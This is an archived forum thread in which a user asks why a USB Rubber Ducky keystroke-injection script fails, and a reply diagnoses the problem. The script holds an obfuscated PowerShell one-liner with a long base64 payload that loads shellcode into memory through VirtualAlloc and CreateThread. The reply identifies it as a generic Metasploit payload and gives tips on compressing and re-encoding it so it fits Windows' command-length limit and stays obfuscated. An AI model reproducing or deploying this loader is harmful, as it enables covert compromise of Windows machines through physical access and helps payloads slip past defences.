Jump to content

Archived

This topic is now archived and is closed to further replies.

Diablo108

Not executing powershell code

Recommended Posts

Hi guys,

i'm trying to put some powershell onto the rubber ducky, but whenever i past the powershell code on the ducky.

it refuses to run it.

i've tested the code whitout the powershell part, and it ran (cause it's not such a difficult code) but after pasting the powershell text.

it just blinks onces red, while inserting the ducky in the pc and then nothing happens.

the code looks like this:

DELAY 750
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING powershell -w 1 -C "s''v nq -;s''v bCi e''c;s''v tU ((g''v nq).value.toString()+(g''v bCi).value.toString());powershell (g''v tU).value.toString() ('JABIAGEAIAA9ACAAJwAkAEUAbAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAFQAawAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEUAbAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABvAGIAIAA9ACAAMAB4AGIAYgAsADAAeABiADAALAAwAHgAZABmACwAMAB4ADcAOQAsADAAeABhADUALAAwAHgAZAA5ACwAMAB4AGMANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBmACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAYQAsADAAeAAzADEALAAwAHgANQBmACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwA3ACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAZQBmACwAMAB4AGQAMQAsADAAeAA5AGIALAAwAHgANQAwACwAMAB4AGYAMwAsADAAeAAwADYALAAwAHgAZAA5ACwAMAB4ADkAYgAsADAAeAAwAGIALAAwAHgAZAA3ACwAMAB4AGIAZQAsADAAeAAxADIALAAwAHgAZQBlACwAMAB4AGUANgAsADAAeABmAGUALAAwAHgANAAxACwAMAB4ADcAYgAsADAAeAA1ADgALAAwAHgAYwBmACwAMAB4ADAAMgAsADAAeAAyADkALAAwAHgANQA1ACwAMAB4AGEANAAsADAAeAA0ADcALAAwAHgAZAA5ACwAMAB4AGUAZQAsADAAeABjADgALAAwAHgANABmACwAMAB4AGUAZQAsADAAeAA0ADcALAAwAHgANgA2ACwAMAB4AGIANgAsADAAeABjADEALAAwAHgANQA4ACwAMAB4AGQAYgAsADAAeAA4AGEALAAwAHgANAAwACwAMAB4AGQAYgAsADAAeAAyADYALAAwAHgAZABmACwAMAB4AGEAMgAsADAAeABlADIALAAwAHgAZQA4ACwAMAB4ADEAMgAsADAAeABhADMALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeABkAGUALAAwAHgAZgAxACwAMAB4AGYAYwAsADAAeAA1ADIALAAwAHgANABkACwAMAB4AGUANQAsADAAeAA4ADkALAAwAHgAMgBmACwAMAB4ADQAZQAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4AGIAZQAsADAAeABkADYALAAwAHgANwAzACwAMAB4ADkAMgAsADAAeABjADEALAAwAHgAZgA3ACwAMAB4ADIAMgAsADAAeABhADgALAAwAHgAOQBiACwAMAB4AGQANwAsADAAeABjADUALAAwAHgANwBkACwAMAB4ADkAMAAsADAAeAA1ADEALAAwAHgAZABkACwAMAB4ADYAMgAsADAAeAA5AGQALAAwAHgAMgA4ACwAMAB4ADUANgAsADAAeAA1ADAALAAwAHgANgA5ACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgAYQA4ACwAMAB4ADkAMgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4ADAANAAsADAAeAA2ADEALAAwAHgANQA4ACwAMAB4ADMAOAAsADAAeABhADIALAAwAHgAOQBhACwAMAB4ADIAZgAsADAAeAAzADAALAAwAHgAZAAwACwAMAB4ADIANwAsADAAeAAyADgALAAwAHgAOAA3ACwAMAB4AGEAYQAsADAAeABmADMALAAwAHgAYgBkACwAMAB4ADEAMwAsADAAeAAwAGMALAAwAHgANwA3ACwAMAB4ADYANQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADUANAAsADAAeABmADAALAAwAHgANwA0ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgANwA2ACwAMAB4AGQAMgAsADAAeABhADcALAAwAHgAYQA0ACwAMAB4ADUAYgAsADAAeAA2ADkALAAwAHgAZAAzACwAMAB4ADIAZAAsADAAeAA1AGEALAAwAHgAYgBkACwAMAB4ADUANQAsADAAeAA3ADUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeAAzAGQALAAwAHgAMgBkACwAMAB4AGUAMAAsADAAeAAzADgALAAwAHgAOQBiACwAMAB4ADgAMAAsADAAeAAxAGQALAAwAHgANQBhACwAMAB4ADQANAAsADAAeAA3AGMALAAwAHgAYgA4ACwAMAB4ADEAMQAsADAAeAA2ADkALAAwAHgANgA5ACwAMAB4AGIAMQAsADAAeAA3ADgALAAwAHgAZQA2ACwAMAB4ADAAMwAsADAAeABhAGYALAAwAHgAZgA2ACwAMAB4AGYANgAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAMgBhACwAMAB4AGYAMwAsADAAeAAzADcALAAwAHgAMgA5ACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAYwAwACwAMAB4ADQAZQAsADAAeABmADEALAAwAHgAMQAzACwAMAB4ADEANQAsADAAeABlADMALAAwAHgAYQA5ACwAMAB4ADAAMAAsADAAeABmAGEALAAwAHgANQA3ACwAMAB4ADIANgAsADAAeAA5AGQALAAwAHgAYQBhACwAMAB4ADIAZQAsADAAeAAxADEALAAwAHgAMQBlACwAMAB4ADgANwAsADAAeAA4ADIALAAwAHgAMABlACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgANwA2ACwAMAB4AGUAMgAsADAAeAAyADMALAAwAHgAOQAxACwAMAB4ADcAOQAsADAAeAAwADQALAAwAHgA'+'YgA0ACwAMAB4ADAAZAAsADAAeABlADEALAAwAHgAMAA0ACwAMAB4AGIANAAsADAAeABjAGQALAAwAHgAMwBkACwAMAB4ADMAMwAsADAAeABmAGQALAAwAHgAOQA0ACwAMAB4ADAAMgAsADAAeAA3AGEALAAwAHgAZgBkACwAMAB4ADcANgAsADAAeABlAGQALAAwAHgAMgBiACwAMAB4ADcANAAsADAAeABlADkALAAwAHgAMgBiACwAMAB4ADIAYwAsADAAeAA1ADMALAAwAHgAOQBjACwAMAB4ADcAMgAsADAAeAA4ADAALAAwAHgAMwA0ACwAMAB4ADkAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQAMQAsADAAeABjAGQALAAwAHgAZgBmACwAMAB4ADUANAAsADAAeAAxAGQALAAwAHgAYQAyACwAMAB4AGEAOQAsADAAeAAzADIALAAwAHgANABhACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZgA4ACwAMAB4ADcAMwAsADAAeAA0AGMALAAwAHgAMQAyACwAMAB4ADkANAAsADAAeAA4ADEALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgAYQA1ACwAMAB4AGMAZAAsADAAeAA4ADMALAAwAHgANgAwACwAMAB4ADIAOQAsADAAeABhADcALAAwAHgAOAA3ACwAMAB4ADIAMgAsADAAeABjADAALAAwAHgAMgA4ACwAMAB4AGQAZQAsADAAeABhAGEALAAwAHgANgAxACwAMAB4ADEAMAAsADAAeAA0ADAALAAwAHgAYQBjACwAMAB4ADcANQAsADAAeAA0ADkALAAwAHgAMgBmACwAMAB4AGUAMgAsADAAeABkAGEALAAwAHgAMgAyACwAMAB4ADgANgAsADAAeAA2AGMALAAwAHgAZgAwACwAMAB4AGMAMgAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4AGYANQAsADAAeAAxAGYALAAwAHgAYgBiACwAMAB4ADIAOAAsADAAeAA3AGMALAAwAHgAOAA5ACwAMAB4AGEAYwAsADAAeAAyADAALAAwAHgANgBjACwAMAB4AGIANQAsADAAeAAyAGMALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA0ADUALAAwAHgAMQA5ACwAMAB4ADcAOQAsADAAeAAyADgALAAwAHgANwAwACwAMAB4ADIAZAAsADAAeAAwAGMALAAwAHgAMQBhACwAMAB4ADEAMgAsADAAeAA0ADIALAAwAHgANQBiACwAMAB4ADAANgAsADAAeABiADQALAAwAHgANQBkACwAMAB4ADcAMQAsADAAeAAyAGQALAAwAHgANwA4ACwAMAB4AGMAYQAsADAAeAA3AGEALAAwAHgAYQAyACwAMAB4ADcAOAAsADAAeAAwAGEALAAwAHgAMQAzACwAMAB4AGMAMgAsADAAeAA3ADgALAAwAHgANABhACwAMAB4AGUAMwAsADAAeAA5ADEALAAwAHgAMQAwACwAMAB4ADEAMgAsADAAeAA0ADcALAAwAHgANAA2ACwAMAB4ADAANQAsADAAeAA1AGQALAAwAHgANQAyACwAMAB4AGYAYQAsADAAeAA5ADYALAAwAHgAZgAxACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgANABmACwAMAB4ADkAZQAsADAAeABlADYALAAwAHgAYwA0ACwAMAB4ADYAZgAsADAAeAA1AGUALAAwAHgAYgA0ACwAMAB4ADUAMgAsADAAeAAwADcALAAwAHgANABjACwAMAB4AGEAYwAsADAAeABkADIALAAwAHgAMwA1ACwAMAB4ADgAZgAsADAAeAAwADUALAAwAHgANgAxACwAMAB4ADcAOQAsADAAeAAwADQALAAwAHgANgBiACwAMAB4AGUAMQAsADAAeAA3AGUALAAwAHgAZQA0ACwAMAB4AGIAMAAsADAAeAA3ADMALAAwAHgANAAwACwAMAB4ADkAMwAsADAAeABkADMALAAwAHgAMgA0ACwAMAB4ADgAMwAsADAAeAAwADMALAAwAHgAZgA0ACwAMAB4AGIAYwAsADAAeABmAGMALAAwAHgANAAzACwAMAB4AGYAYgAsADAAeAAwAGUALAAwAHgAMwAyACwAMAB4ADkAMgAsADAAeAAzADUALAAwAHgANAAxACwAMAB4ADEAYwAsADAAeABkAGIALAAwAHgAMAA1ACwAMAB4ADkAMQAsADAAeAA0AGUALAAwAHgAMgAyACwAMAB4ADUAZgAsADAAeABkADEAOwAkAEoAdAAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABvAGIALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQASgB0ACAAPQAgACQAbwBiAC4ATABlAG4AZwB0AGgAfQA7ACQAcQBuAD0AJABUAGsAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABKAHQALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABPAFcAPQAwADsAJABPAFcAIAAtAGwAZQAgACgAJABvAGIALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQATwBXACsAKwApACAAewAkAFQAawA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAbgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABPAFcAKQAsACAAJABvAGIAWwAkAE8AVwBdACwAIAAxACkAfQA7ACQAVABrADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAG4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAHkAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABIAGEAKQApADsAJABvAFkAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYwBiACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGMAYgAgACQAbwBZACAAJAB5AFIAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbwBZACAAJAB5AFIAIgA7AH0A')"
ENTER

i tested it with after the 2nd STRING only the text ipconfig, to see if it works. 

and it ran, 

so why doesn't it run at all after pasting powershell text??

 

Share this post


Link to post
Share on other sites

Obfuscated Powershell I see.  There is a way to obfuscate more but I digress.  Issue you are having issues is because your are dancing around the max run line length.  Windows run line has a max length for commands, around 8k characters.  I don't have the exact number on me but I use 8000 as a rough estimate since it is so close to it.  Anything after that magic number is truncated so your command will be broken.

I looked through your encoded powershell.  You might can get away with compressing the payload, encode and then wrap the code to decompress and run around the encoded code and encode that to use.  You will have to do a size comparison afterwards to see if it made a difference.  Looks like a generic metasploit payload when decoded but doesn't do much for obfuscating the actual payload, you might even be able to get away with removing all that obfuscation.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...